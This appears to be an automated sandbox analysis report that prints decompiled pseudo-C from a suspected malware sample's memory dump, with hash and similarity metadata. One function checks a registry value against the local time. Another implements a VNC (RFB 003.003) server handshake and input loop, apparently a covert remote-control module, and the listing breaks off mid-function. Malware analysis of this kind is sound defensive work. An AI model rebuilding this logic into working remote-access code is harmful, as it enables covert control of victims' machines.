    • Instruction ID: c77a9d8e60490356592a22d56ba4c7f9111c260c5351c9b75bff1fecf2779d42
    • Opcode Fuzzy Hash: a71da2171ce97ae4f57e3157b7c8c0564d31bb7d8a1366b636c910df6c6e70ae
    • Instruction Fuzzy Hash: 1C81E4717043119BD320DF51EC44BABB7E8EFD8714F41491EBA84A32A0DB74E945CB96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00424750() {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				int* _t127;
    				int* _t131;
    				signed int _t132;
    				int* _t133;
    				int* _t134;
    				int* _t135;
    				signed int _t136;
    				signed int _t137;
    				int* _t140;
    				signed int _t141;
    				signed int _t144;
    				signed int _t147;
    				signed char _t150;
    				void* _t154;
    				int* _t168;
    				int* _t172;
    				int* _t181;
    				int* _t185;
    				int* _t190;
    				void* _t191;
    				int* _t194;
    				int* _t195;
    				intOrPtr _t198;
    				void* _t200;
    				signed int _t204;
    				signed int _t205;
    				long _t210;
    				void* _t226;
    				signed int _t241;
    				long _t243;
    				int* _t256;
    				int _t257;
    				void* _t258;
    				long _t260;
    				intOrPtr _t261;
    				short* _t262;
    				signed int _t267;
    				void* _t268;
    				signed int _t274;
    				intOrPtr _t276;
    				signed short* _t277;
    				void* _t278;
    
    				_t276 =  *((intOrPtr*)(_t278 + 0x124));
    				_t263 =  *((intOrPtr*)(_t276 + 0x40));
    				if( *((intOrPtr*)(_t276 + 0x40)) != 0) {
    					 *(_t278 + 0x10) = 0;
    					_t256 = E00418BD0(0x4e27, 0x10000000, _t263);
    					__eflags = _t256;
    					if(_t256 == 0) {
    						L5:
    						_t257 =  *(_t278 + 0x3c);
    					} else {
    						_t195 = E00418C20(_t256);
    						 *(_t278 + 0x10) = _t195;
    						__eflags = _t195;
    						if(_t195 == 0) {
    							goto L5;
    						} else {
    							_t257 = _t256[3];
    						}
    					}
    					_t127 =  *(_t278 + 0x10);
    					 *((intOrPtr*)(_t276 + 0x3c)) = 0;
    					 *((intOrPtr*)(_t276 + 0x38)) = 0;
    					__eflags = _t127;
    					if(_t127 != 0) {
    						__eflags = _t257 - 0x10;
    						if(_t257 > 0x10) {
    							asm("sbb edx, edx");
    							_t241 = ( ~( *((intOrPtr*)(_t276 + 0x18)) - 0x00000001 & 0x000000ff) & 0x00000020) + 0x00000020 & 0x0000ffff;
    							_t277 = _t127;
    							_t131 = _t127 + _t257;
    							__eflags = _t131;
    							 *(_t278 + 0x3c) = _t241;
    							 *(_t278 + 0x44) = _t131;
    							 *(_t278 + 0x18) = 1;
    							while(1) {
    								_t132 = _t277[1] & 0x0000ffff;
    								__eflags = _t132 - 0x10;
    								if(_t132 < 0x10) {
    									goto L71;
    								}
    								_t204 = _t277[2] & 0x0000ffff;
    								__eflags = _t204 - _t132;
    								if(_t204 < _t132) {
    									__eflags = _t277[3] - _t132;
    									if(_t277[3] < _t132) {
    										__eflags = _t277[4] - _t132;
    										if(_t277[4] < _t132) {
    											__eflags = _t277[5] - _t132;
    											if(_t277[5] < _t132) {
    												__eflags = _t277[6] - _t132;
    												if(_t277[6] < _t132) {
    													__eflags = _t277[7] - _t132;
    													if(_t277[7] < _t132) {
    														_t133 = _t277 + _t204;
    														_t205 =  *_t277 & 0x0000ffff;
    														_t267 = _t205 >> 0x00000009 & 0x00000008;
    														__eflags = (_t205 & _t241) - _t241;
    														if((_t205 & _t241) != _t241) {
    															L60:
    															_t134 =  *(_t278 + 0x44);
    															_t277 = _t277 + (_t277[1] & 0x0000ffff);
    															_t106 =  &(_t277[8]); // 0x10
    															__eflags = _t106 - _t134;
    															if(_t106 <= _t134) {
    																__eflags = _t277 + (_t277[1] & 0x0000ffff) - _t134;
    																if(_t277 + (_t277[1] & 0x0000ffff) <= _t134) {
    																	 *(_t278 + 0x18) =  *(_t278 + 0x18) + 1;
    																	_t241 =  *(_t278 + 0x3c);
    																	continue;
    																}
    															}
    														} else {
    															_t198 =  *((intOrPtr*)(_t278 + 0x12c));
    															_t243 =  *(_t198 + 0xc);
    															_t258 =  *(_t198 + 8);
    															_t210 = 0;
    															 *(_t278 + 0x1c) = 0x2a23;
    															 *(_t278 + 0x20) = _t133;
    															__eflags = _t133;
    															if(_t133 != 0) {
    																__eflags =  *_t133;
    																if( *_t133 != 0) {
    																	do {
    																		_t210 = _t210 + 1;
    																		__eflags =  *((char*)(_t133 + _t210));
    																	} while ( *((char*)(_t133 + _t210)) != 0);
    																}
    															}
    															 *(_t278 + 0x24) = _t210;
    															 *(_t278 + 0x38) = _t267 | 0x00000001;
    															 *(_t278 + 0x28) = _t258;
    															 *(_t278 + 0x2c) = _t243;
    															_t135 = E00412090(_t278 + 0x1c);
    															__eflags = _t135;
    															if(_t135 == 0) {
    																goto L60;
    															} else {
    																_t214 =  *(_t198 + 0x44);
    																__eflags =  *(_t198 + 0x44);
    																if(__eflags == 0) {
    																	L24:
    																	_t136 = _t277[4] & 0x0000ffff;
    																	__eflags = _t136;
    																	if(_t136 == 0) {
    																		L26:
    																		_t137 = _t277[5] & 0x0000ffff;
    																		__eflags = _t137;
    																		if(_t137 == 0) {
    																			L28:
    																			__eflags =  *_t277 & 0x00000010;
    																			if(( *_t277 & 0x00000010) == 0) {
    																				L35:
    																				E00410870(_t278 + 0x24, _t278 + 0x24, 0, 0x1c);
    																				_t260 = _t277 + (_t277[2] & 0x0000ffff);
    																				__eflags = _t260;
    																				 *(_t278 + 0x1c) =  *_t277 & 0x0000ffff;
    																				if(_t260 != 0) {
    																					_t268 = 0;
    																					__eflags =  *_t260;
    																					if( *_t260 != 0) {
    																						do {
    																							_t268 = _t268 + 1;
    																							__eflags =  *((char*)(_t268 + _t260));
    																						} while ( *((char*)(_t268 + _t260)) != 0);
    																					}
    																					_t70 = _t268 + 1; // 0x2
    																					_t140 = _t70;
    																					__eflags = _t140;
    																					if(_t140 != 0) {
    																						_t140 = HeapAlloc( *0x42e6d4, 8,  &(_t140[1]));
    																						__eflags = _t140;
    																						if(_t140 != 0) {
    																							_t140 = E00410820(_t140, _t260, _t268);
    																						}
    																					}
    																					_t260 = 0;
    																					__eflags = 0;
    																				} else {
    																					_t140 = 0;
    																				}
    																				 *(_t278 + 0x20) = _t140;
    																				_t141 = _t277[3] & 0x0000ffff;
    																				__eflags = _t141 - _t260;
    																				if(_t141 != _t260) {
    																					__eflags = _t141 | 0xffffffff;
    																					 *(_t278 + 0x24) = E00410E10(_t141 | 0xffffffff, _t277 + _t141);
    																				} else {
    																					 *(_t278 + 0x24) = _t260;
    																				}
    																				_t144 = _t277[6] & 0x0000ffff;
    																				__eflags = _t144 - _t260;
    																				if(_t144 != _t260) {
    																					__eflags = _t144 | 0xffffffff;
    																					 *(_t278 + 0x28) = E00410E10(_t144 | 0xffffffff, _t277 + _t144);
    																				} else {
    																					 *(_t278 + 0x28) = _t260;
    																				}
    																				_t147 = _t277[7] & 0x0000ffff;
    																				__eflags = _t147 - _t260;
    																				if(_t147 != _t260) {
    																					__eflags = _t147 | 0xffffffff;
    																					 *(_t278 + 0x2c) = E00410E10(_t147 | 0xffffffff, _t277 + _t147);
    																				} else {
    																					 *(_t278 + 0x2c) = _t260;
    																				}
    																				_t150 =  *_t277 & 0x0000ffff;
    																				__eflags = _t150 & 0x00000003;
    																				if((_t150 & 0x00000003) != 0) {
    																					E00425CF0( *(_t198 + 0x3c),  *(_t198 + 0x38));
    																					 *(_t198 + 0x3c) = _t260;
    																					_t154 = HeapAlloc( *0x42e6d4, _t260, 0x20);
    																					__eflags = _t154 - _t260;
    																					if(_t154 != _t260) {
    																						_t154 = E00410820(_t154, _t278 + 0x20, 0x1c);
    																					}
    																					 *(_t198 + 0x38) = _t154;
    																					__eflags = _t154 - _t260;
    																					if(_t154 == _t260) {
    																						E00425C80(_t278 + 0x1c);
    																					} else {
    																						 *(_t198 + 0x3c) =  *(_t198 + 0x3c) + 1;
    																					}
    																				} else {
    																					__eflags = _t150 & 0x0000000c;
    																					if(__eflags == 0) {
    																						E00425C80(_t278 + 0x1c);
    																						goto L60;
    																					} else {
    																						_t261 =  *((intOrPtr*)(_t278 + 0x12c));
    																						_t200 = E00418C90(0x40000000,  *(_t278 + 0x18),  *((intOrPtr*)(_t261 + 0x40)), __eflags, _t278 + 0x34);
    																						 *(_t278 + 0x30) = _t200;
    																						__eflags = _t200;
    																						if(_t200 == 0) {
    																							L70:
    																							E00425C80(_t278 + 0x1c);
    																							E00425CF0( *(_t261 + 0x3c),  *((intOrPtr*)(_t261 + 0x38)));
    																							 *(_t261 + 0x3c) = 0;
    																						} else {
    																							_t168 = E00419620( *((intOrPtr*)(_t278 + 0x34)), _t200);
    																							__eflags = _t168;
    																							if(_t168 == 0) {
    																								L68:
    																								__eflags = _t200;
    																								if(_t200 != 0) {
    																									HeapFree( *0x42e6d4, 0, _t200);
    																								}
    																								goto L70;
    																							} else {
    																								_t171 =  *(_t261 + 0x3c) + 1;
    																								_t273 = _t261 + 0x38;
    																								_t172 = E00410740(( *(_t261 + 0x3c) + 1) * 8 - _t171 + ( *(_t261 + 0x3c) + 1) * 8 - _t171 + ( *(_t261 + 0x3c) + 1) * 8 - _t171 + ( *(_t261 + 0x3c) + 1) * 8 - _t171, _t261 + 0x38);
    																								__eflags = _t172;
    																								if(_t172 == 0) {
    																									goto L68;
    																								} else {
    																									_t173 =  *(_t261 + 0x3c);
    																									 *(_t261 + 0x3c) =  *(_t261 + 0x3c) + 1;
    																									E00410820( *_t273 + (_t173 * 8 - _t173) * 4, _t278 + 0x20, 0x1c);
    																									goto L60;
    																								}
    																							}
    																						}
    																					}
    																				}
    																			} else {
    																				__eflags = _t277[6];
    																				if(_t277[6] <= 0) {
    																					goto L35;
    																				} else {
    																					_push(_t278 + 0xc0);
    																					_t262 = _t278 + 0x80;
    																					E0041D340(_t262, 1);
    																					_t226 = _t277 + (_t277[6] & 0x0000ffff);
    																					_push(E00411B00(_t226));
    																					_push(_t226);
    																					_push(_t278 + 0x70);
    																					_t181 = E00412470();
    																					__eflags = _t181;
    																					if(_t181 == 0) {
    																						goto L60;
    																					} else {
    																						E00411310(_t262, _t278 + 0x68);
    																						 *((intOrPtr*)(_t278 + 0x54)) = 0x10;
    																						 *(_t278 + 0x28) = 0x80000001;
    																						_t274 = _t267 | 0xffffffff;
    																						_t185 = RegOpenKeyExW(0x80000001, _t278 + 0xcc, 0, 1, _t278 + 0x14);
    																						__eflags = _t185;
    																						if(_t185 != 0) {
    																							goto L35;
    																						} else {
    																							__eflags = RegQueryValueExW( *(_t278 + 0x18), _t262, _t185, _t185, _t278 + 0x4c, _t278 + 0x40);
    																							_t275 =  ==  ?  *(_t278 + 0x40) : _t274;
    																							RegCloseKey( *(_t278 + 0x14));
    																							__eflags = ( ==  ?  *(_t278 + 0x40) : _t274) - 0x10;
    																							if(( ==  ?  *(_t278 + 0x40) : _t274) != 0x10) {
    																								goto L35;
    																							} else {
    																								GetLocalTime(_t278 + 0x58);
    																								__eflags =  *((intOrPtr*)(_t278 + 0x4e)) -  *((intOrPtr*)(_t278 + 0x5e));
    																								if( *((intOrPtr*)(_t278 + 0x4e)) !=  *((intOrPtr*)(_t278 + 0x5e))) {
    																									goto L35;
    																								} else {
    																									__eflags =  *((intOrPtr*)(_t278 + 0x4a)) -  *((intOrPtr*)(_t278 + 0x5a));
    																									if( *((intOrPtr*)(_t278 + 0x4a)) ==  *((intOrPtr*)(_t278 + 0x5a))) {
    																										goto L60;
    																									} else {
    																										goto L35;
    																									}
    																								}
    																							}
    																						}
    																					}
    																				}
    																			}
    																		} else {
    																			_t190 = E004242A0(_t277 + _t137,  *((intOrPtr*)(_t198 + 0x24)),  *((intOrPtr*)(_t198 + 0x28)));
    																			__eflags = _t190;
    																			if(_t190 == 0) {
    																				goto L60;
    																			} else {
    																				goto L28;
    																			}
    																		}
    																	} else {
    																		_t191 = E004242A0(_t277 + _t136,  *((intOrPtr*)(_t198 + 0x24)),  *((intOrPtr*)(_t198 + 0x28)));
    																		__eflags = _t191 - 1;
    																		if(_t191 == 1) {
    																			goto L60;
    																		} else {
    																			goto L26;
    																		}
    																	}
    																} else {
    																	_push(_t267);
    																	_push( *(_t198 + 0xc));
    																	_push( *(_t198 + 8));
    																	_t194 = E00424660(4, _t214, __eflags);
    																	__eflags = _t194;
    																	if(_t194 != 0) {
    																		goto L60;
    																	} else {
    																		goto L24;
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    								goto L71;
    							}
    						}
    						L71:
    						HeapFree( *0x42e6d4, 0,  *(_t278 + 0x10));
    						_t276 =  *((intOrPtr*)(_t278 + 0x12c));
    					}
    					__eflags = 0 -  *((intOrPtr*)(_t276 + 0x3c));
    					asm("sbb eax, eax");
    					return  ~0x00000000;
    				} else {
    					return 0;
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID: #*
    • API String ID: 0-617327688
    • Opcode ID: c7c6cc96431de10e01a59e2fea838ddf112d96ff851207b2db074fb64dca1108
    • Instruction ID: c01bc10db75af69655cd76f4fc787d2ba62fe7d6d24990ce14890d101d8856a2
    • Opcode Fuzzy Hash: c7c6cc96431de10e01a59e2fea838ddf112d96ff851207b2db074fb64dca1108
    • Instruction Fuzzy Hash: 46D1D3702043249BDB14DF65E880BABB7E4FFC4704F80891EF99587241D7B8E981CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E00406350() {
    				signed int __ebx;
    				void* __edi;
    				void* __esi;
    				void __ebp;
    				intOrPtr _t204;
    				void* _t207;
    				signed char _t210;
    				long _t223;
    				signed int _t252;
    				void* _t262;
    				void* _t263;
    				void* _t266;
    				long _t268;
    				void* _t270;
    				intOrPtr _t279;
    				void* _t282;
    				void* _t284;
    				intOrPtr _t346;
    				void* _t349;
    				intOrPtr _t355;
    				signed int _t356;
    				void* _t360;
    				intOrPtr* _t362;
    				signed int _t363;
    				void* _t364;
    				void* _t365;
    
    				_t277 =  *((intOrPtr*)(_t365 + 0x184));
    				_t362 = __imp__#19;
    				_t204 =  *_t362( *((intOrPtr*)(_t365 + 0x184)), "RFB 003.003\n", 0xc, 0);
    				if(_t204 != 0xc) {
    					L106:
    					return _t204;
    				} else {
    					_t204 = E00414B90(0xc, _t277, 0x1b7740, _t365 + 0x38);
    					if(_t204 == 0) {
    						goto L106;
    					} else {
    						_t207 = 0;
    						while(1) {
    							_t3 = _t207 + "RFB "; // 0x20424652
    							_t284 =  *((char*)(_t365 + _t207 + 0x38)) -  *_t3;
    							if(_t284 != 0) {
    								break;
    							}
    							_t207 = _t207 + 1;
    							if(_t207 < 4) {
    								continue;
    							} else {
    								L7:
    								 *((char*)(_t365 + 0x3f)) = 0;
    								 *((char*)(_t365 + 0x43)) = 0;
    								_t210 = E004110A0(_t365 + 0x40, 0);
    								_t204 = ((E004110A0(_t365 + 0x3c, 0) & 0x000000ff | (_t210 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
    								if(_t204 > 0x300) {
    									goto L106;
    								} else {
    									 *((intOrPtr*)(_t365 + 0x18)) = 1;
    									 *((intOrPtr*)(_t365 + 0x2c)) = 0;
    									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t365 + 0x194)) + 4))))(_t365 + 0x28);
    									_t218 =  *(_t365 + 0x14);
    									_t353 =  *((intOrPtr*)(_t365 + 0x190));
    									_push(0);
    									_push(4);
    									_push(_t365 + 0x34);
    									_push( *((intOrPtr*)(_t365 + 0x190)));
    									 *(_t365 + 0x3c) = ( *(_t365 + 0x14) & 0x00ff0000 |  *(_t365 + 0x14) >> 0x00000010) >> 0x00000008 | (_t218 & 0x0000ff00 | _t218 << 0x00000010) << 0x00000008;
    									if( *_t362() != 4) {
    										 *(_t365 + 0x14) = 0xffffffff;
    									}
    									_t223 =  *(_t365 + 0x14);
    									if(_t223 == 0) {
    										return E004062D0( *((intOrPtr*)(_t365 + 0x28)), _t353);
    									}
    									_t204 = _t223 - 1;
    									if(_t204 != 0) {
    										goto L106;
    									} else {
    										_t279 =  *((intOrPtr*)(_t365 + 0x190));
    										_t204 = E00414B90(1, _t279, 0x1b7740, _t365 + 0x13);
    										if(_t204 == 0) {
    											goto L106;
    										} else {
    											_t355 =  *((intOrPtr*)(_t365 + 0x194));
    											_t204 =  *((intOrPtr*)( *((intOrPtr*)(_t355 + 8))))();
    											if(_t204 == 0) {
    												goto L106;
    											} else {
    												 *((intOrPtr*)(_t365 + 0x2c)) = 0;
    												_t204 =  *((intOrPtr*)( *((intOrPtr*)(_t355 + 0xc))))(_t365 + 0x80);
    												if(_t204 == 0) {
    													goto L106;
    												} else {
    													_t204 = E00406080(_t365 + 0x84,  *((intOrPtr*)(_t365 + 0x198)));
    													_t346 = _t204;
    													 *((intOrPtr*)(_t365 + 0x20)) = _t346;
    													if(_t346 == 0) {
    														goto L106;
    													} else {
    														_t356 = E00411B00( *((intOrPtr*)(_t365 + 0x28)));
    														 *(_t365 + 0x5c) = ( *(_t346 + 8) & 0x0000ffff) << 0x00000008 |  *(_t346 + 9) & 0x000000ff;
    														 *(_t365 + 0x5e) = ( *(_t346 + 0xa) & 0x0000ffff) << 0x00000008 |  *(_t346 + 0xb) & 0x000000ff;
    														 *(_t365 + 0x74) = (_t356 & 0x00ff0000 | _t356 >> 0x00000010) >> 0x00000008 | (_t356 << 0x00000010 | _t356 & 0x0000ff00) << 0x00000008;
    														_t48 = _t346 + 0x20; // 0x20
    														E00410820(_t365 + 0x68, _t48, 0x10);
    														asm("rol dx, 0x8");
    														_push(0);
    														 *(_t365 + 0x68) =  *(_t365 + 0x64) & 0x0000ffff;
    														_push(0x18);
    														asm("rol ax, 0x8");
    														_push(_t365 + 0x64);
    														asm("rol cx, 0x8");
    														_push(_t279);
    														 *((short*)(_t365 + 0x76)) =  *(_t365 + 0x66) & 0x0000ffff;
    														 *((short*)(_t365 + 0x78)) =  *(_t365 + 0x68) & 0x0000ffff;
    														if( *_t362() != 0x18) {
    															L104:
    															return E00406260(_t346);
    														} else {
    															if(_t356 == 0) {
    																L19:
    																 *(_t365 + 0x3c) = 0;
    																 *(_t365 + 0x3d) = 0xffffffff;
    																E00410870(E00410870(_t365 + 0x90, _t365 + 0x90, 0, 0xff), _t365 + 0x90, 0, 0xff);
    																 *(_t365 + 0x24) = 0;
    																 *(_t365 + 0x14) = 0;
    																goto L20;
    																do {
    																	do {
    																		L20:
    																		while(1) {
    																			L20:
    																			while(1) {
    																				L20:
    																				while( *(_t365 + 0x24) > 0) {
    																					_t262 = E004151B0(0, _t365 + 0x194, 0x12c, 0);
    																					if(_t262 != 0xffffffff) {
    																						break;
    																					} else {
    																						__imp__#111();
    																						if(_t262 == 0x274c) {
    																							_t263 =  *(_t365 + 0x19c);
    																							if(_t263 != 0) {
    																								WaitForSingleObject(_t263, 0xffffffff);
    																							}
    																							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t365 + 0x194)) + 0x10))))();
    																							_t363 =  *(_t365 + 0x24);
    																							_t349 = 0;
    																							if(_t363 == 0) {
    																								L36:
    																								_t266 =  *(_t365 + 0x19c);
    																								if(_t266 != 0) {
    																									ReleaseMutex(_t266);
    																								}
    																								continue;
    																							} else {
    																								_t282 = 0;
    																								_t364 = _t363 + _t363 * 8;
    																								do {
    																									_t268 =  *(_t365 + 0x14);
    																									_t360 = _t282 + _t268;
    																									if( *((short*)(_t282 + _t268 + 5)) <= 0 ||  *((short*)(_t360 + 7)) <= 0) {
    																										goto L35;
    																									} else {
    																										_push(_t360);
    																										_push( *((intOrPtr*)(_t365 + 0x190)));
    																										_t270 = E00405C70( *((intOrPtr*)(_t365 + 0x20)));
    																										if(_t270 == 0xffffffff || _t270 == 0) {
    																											if( *(_t365 + 0x19c) != 0) {
    																												ReleaseMutex( *(_t365 + 0x19c));
    																											}
    																										} else {
    																											if(_t270 == 1) {
    																												_t79 = _t349 + 1; // 0x1
    																												if(_t79 !=  *(_t365 + 0x24)) {
    																													E00410870(_t270, _t360, 0, 9);
    																												} else {
    																													 *(_t365 + 0x24) =  *(_t365 + 0x24) - 1;
    																													_t364 = _t364 - 9;
    																													E00410740(_t364, _t365 + 0x14);
    																												}
    																											}
    																											goto L35;
    																										}
    																									}
    																									goto L103;
    																									L35:
    																									_t349 = _t349 + 1;
    																									_t282 = _t282 + 9;
    																								} while (_t349 <  *(_t365 + 0x24));
    																								goto L36;
    																							}
    																						}
    																					}
    																					L103:
    																					E00406260( *((intOrPtr*)(_t365 + 0x20)));
    																					return E004107C0( *(_t365 + 0x14));
    																					goto L107;
    																				}
    																				if(E00414B90(1,  *((intOrPtr*)(_t365 + 0x190)), 0x1b7740, _t365 + 0x13) != 0) {
    																					_t252 =  *(_t365 + 0x13) & 0x000000ff;
    																					if(_t252 <= 6) {
    																						switch( *((intOrPtr*)(_t252 * 4 +  &M00406C98))) {
    																							case 0:
    																								if(E00414C40(_t280, 0x1b7740, 3) != 0 && E00414B90(0x10, _t280, 0x1b7740, _t365 + 0x4c) != 0) {
    																									_t256 =  *(_t365 + 0x4c);
    																									if(_t256 == 0x20 || _t256 == 0x10 || _t256 == 8) {
    																										if( *((char*)(_t365 + 0x4f)) != 0) {
    																											_t338 =  *((intOrPtr*)(_t365 + 0x50));
    																											asm("rol dx, 0x8");
    																											asm("rol ax, 0x8");
    																											asm("rol cx, 0x8");
    																											 *(_t365 + 0x5c) =  *((intOrPtr*)(_t365 + 0x54));
    																											 *(_t365 + 0x58) = _t338;
    																											 *((char*)(_t365 + 0x5b)) = 1;
    																											 *((char*)(_t365 + 0x5a)) = _t338 & 0xffffff00 |  *((char*)(_t365 + 0x52)) != 0x00000000;
    																											 *(E00410820( *((intOrPtr*)(_t365 + 0x28)) + 0x31, _t365 + 0x50, 0x10) + 0x41) =  *(_t365 + 0x4c) >> 3;
    																											goto L20;
    																										}
    																									}
    																								}
    																								goto L103;
    																							case 1:
    																								goto L103;
    																							case 2:
    																								__edi = 0x1b7740;
    																								__eax = E00414C40(__ebx, 0x1b7740, 1);
    																								if(__al != 0) {
    																									__eax = __esp + 0x48;
    																									2 = E00414B90(2, __ebx, __esi, __esp + 0x48);
    																									if(__al != 0) {
    																										__ecx =  *(__esp + 0x48) & 0x0000ffff;
    																										__ebp =  *(__esp + 0x20);
    																										__ecx = __ecx & 0x000000ff;
    																										__eax = (__ecx & 0x000000ff) << 8;
    																										__eax = __eax | __ecx;
    																										 *(__ebp + 0x4c) = 0;
    																										 *(__ebp + 0x48) = __ax;
    																										if(__ax == 0) {
    																											L59:
    																											__eax =  *(__ebp + 0x4c);
    																											__eax = __eax << 0x10;
    																											__eax = __eax & 0x0000ff00;
    																											__edx = __eax << 0x00000010 | __eax & 0x0000ff00;
    																											__eax = __eax >> 8;
    																											__edx = (__eax << 0x00000010 | __eax & 0x0000ff00) << 8;
    																											__ecx = __eax >> 0x00000008 & 0x0000ff00;
    																											__edx = (__eax << 0x00000010 | __eax & 0x0000ff00) << 0x00000008 | __eax >> 0x00000008 & 0x0000ff00;
    																											__ecx =  *(__ebp + 0x4f) & 0x000000ff;
    																											__edx = (__eax << 0x00000010 | __eax & 0x0000ff00) << 0x00000008 | __eax >> 0x00000008 & 0x0000ff00 |  *(__ebp + 0x4f) & 0x000000ff;
    																											 *(__ebp + 0x50) = (__eax << 0x00000010 | __eax & 0x0000ff00) << 0x00000008 | __eax >> 0x00000008 & 0x0000ff00 |  *(__ebp + 0x4f) & 0x000000ff;
    																											if(__eax != 5) {
    																												__eax =  *(__ebp + 0x1c);
    																												__eax = E004107C0( *(__ebp + 0x1c));
    																												 *(__ebp + 0x1c) = 0;
    																												goto L20;
    																											} else {
    																												goto L60;
    																											}
    																										} else {
    																											__ax & 0x0000ffff = (__ax & 0x0000ffff) + (__ax & 0x0000ffff);
    																											__ebx = (__ax & 0x0000ffff) + (__ax & 0x0000ffff) + (__ax & 0x0000ffff) + (__ax & 0x0000ffff);
    																											__edi = __ebp + 0x44;
    																											__ecx = __ebx;
    																											__esi = __edi;
    																											__eax = E00410740(__ebx, __esi);
    																											if(__al != 0) {
    																												__ecx =  *__edi;
    																												__eax = __ebx;
    																												__ebx =  *(__esp + 0x190);
    																												__esi = 0x1b7740;
    																												__eax = E00414B90(__eax, __ebx, 0x1b7740,  *__edi);
    																												if(__al != 0) {
    																													__edx = 0;
    																													__esi = 0;
    																													if(__dx <  *(__ebp + 0x48)) {
    																														__edx =  *__edi;
    																														do {
    																															__si & 0x0000ffff = (__si & 0x0000ffff) + (__si & 0x0000ffff);
    																															__eax = (__si & 0x0000ffff) + (__si & 0x0000ffff) + (__si & 0x0000ffff) + (__si & 0x0000ffff);
    																															__ecx =  *(__eax + __edx);
    																															__ecx = __ecx << 0x10;
    																															__ecx = __ecx & 0x0000ff00;
    																															__ebx = __ecx << 0x00000010 | __ecx & 0x0000ff00;
    																															__ebp =  *(__eax + __edx + 3) & 0x000000ff;
    																															__ebx = (__ecx << 0x00000010 | __ecx & 0x0000ff00) << 8;
    																															__ecx = __ecx >> 8;
    																															__ebx = __ebx |  *(__eax + __edx + 3) & 0x000000ff;
    																															__ebx = __ebx | __ecx;
    																															 *(__eax + __edx) = __ebx;
    																															__edx =  *__edi;
    																															if( *(__eax + __edx) == 5) {
    																																__eax =  *(__esp + 0x20);
    																																 *((intOrPtr*)( *(__esp + 0x20) + 0x4c)) = 5;
    																															}
    																															__ecx =  *(__esp + 0x20);
    																															__esi = __esi + 1;
    																														} while (__si <  *((intOrPtr*)(__ecx + 0x48)));
    																														__ebp = __ecx;
    																													}
    																													goto L59;
    																												}
    																											}
    																										}
    																									}
    																								}
    																								goto L103;
    																							case 3:
    																								__edx = __esp + 0x38;
    																								9 = E00414B90(9, __ebx, __esi, __esp + 0x38);
    																								if(__al != 0) {
    																									__eax =  *(__esp + 0x39) & 0x0000ffff;
    																									__dx =  *((intOrPtr*)(__esp + 0x3d));
    																									asm("rol ax, 0x8");
    																									asm("rol cx, 0x8");
    																									 *(__esp + 0x39) = __ax;
    																									__eax =  *(__esp + 0x3f) & 0x0000ffff;
    																									asm("rol dx, 0x8");
    																									asm("rol ax, 0x8");
    																									__ecx = __ecx & 0xffffff00 |  *(__esp + 0x38) != 0x00000000;
    																									 *(__esp + 0x38) = __cl;
    																									__ecx =  *(__esp + 0x24);
    																									__edi = 0;
    																									 *((short*)(__esp + 0x3d)) = __dx;
    																									 *(__esp + 0x3f) = __ax;
    																									if(__ecx != 0) {
    																										__eax =  *(__esp + 0x14);
    																										__eax = 7 +  *(__esp + 0x14);
    																										while( *((short*)(__eax - 2)) != 0 ||  *__eax != 0) {
    																											__edi = __edi + 1;
    																											__eax = __eax + 9;
    																											if(__edi < __ecx) {
    																												continue;
    																											}
    																											goto L70;
    																										}
    																									}
    																									L70:
    																									if(__edi != __ecx) {
    																										L72:
    																										__eax =  *(__esp + 0x14);
    																										__edx = __esp + 0x3c;
    																										__eax + __edi * 8 = __eax + __edi * 8 + __edi;
    																										__eax = E00410820(__eax + __edi * 8 + __edi, __esp + 0x3c, 9);
    																										goto L20;
    																									} else {
    																										__ecx = __ecx + 1;
    																										 *(__esp + 0x24) = __ecx;
    																										__ecx = __ecx + __ecx * 8;
    																										__esi = __esp + 0x14;
    																										__eax = E00410740(__ecx, __esi);
    																										if(__al != 0) {
    																											goto L72;
    																										}
    																									}
    																								}
    																								goto L103;
    																							case 4:
    																								__edx = __esp + 0x74;
    																								__eax = 7;
    																								__eax = E00414B90(7, __ebx, __esi, __esp + 0x74);
    																								if(__al != 0) {
    																									__eax = __eax & 0xffffff00 |  *(__esp + 0x74) != 0x00000000;
    																									__ecx = __al & 0x000000ff;
    																									__eax =  *(__esp + 0x77);
    																									_push(__al & 0x000000ff);
    																									__edx = __eax;
    																									__eax = __eax >> 0x10;
    																									__edx = __eax & 0x00ff0000;
    																									__edx = __eax & 0x00ff0000 | __eax >> 0x00000010;
    																									__ecx = __eax;
    																									__ecx = __eax << 0x10;
    																									__ecx = __ecx | __eax;
    																									__eax =  *(__esp + 0x198);
    																									__ecx = __ecx << 8;
    																									__edx = __edx | __ecx;
    																									__ecx =  *__eax;
    																									__eax =  *(__eax + 0x14);
    																									__eax =  *__eax();
    																									goto L20;
    																								}
    																								goto L103;
    																							case 5:
    																								__ecx = __esp + 0x18;
    																								5 = E00414B90(5, __ebx, __esi, __esp + 0x18);
    																								if(__al != 0) {
    																									__dx =  *(__esp + 0x19);
    																									__ax =  *(__esp + 0x1b);
    																									asm("rol dx, 0x8");
    																									asm("rol ax, 0x8");
    																									 *((short*)(__esp + 0x1d)) = __dx;
    																									 *(__esp + 0x1f) = __ax;
    																									__edi = 0;
    																									__esi = 0x8000;
    																									GetSystemMetrics(0x17) = __eax & 0xffffff00 | __eax != 0x00000000;
    																									if( *(__esp + 0x19) !=  *((intOrPtr*)(__esp + 0x31))) {
    																										L78:
    																										__esi = 0x8001;
    																									} else {
    																										__dx =  *((intOrPtr*)(__esp + 0x33));
    																										if( *(__esp + 0x1b) != __dx) {
    																											goto L78;
    																										}
    																									}
    																									__dl =  *((intOrPtr*)(__esp + 0x30));
    																									__cl =  *(__esp + 0x18);
    																									__cl =  *(__esp + 0x18) & 0x00000001;
    																									if(__cl != (__dl & 0x00000001)) {
    																										__ecx = __al & 0x000000ff;
    																										if(__cl == 0) {
    																											__ecx =  ~__ecx;
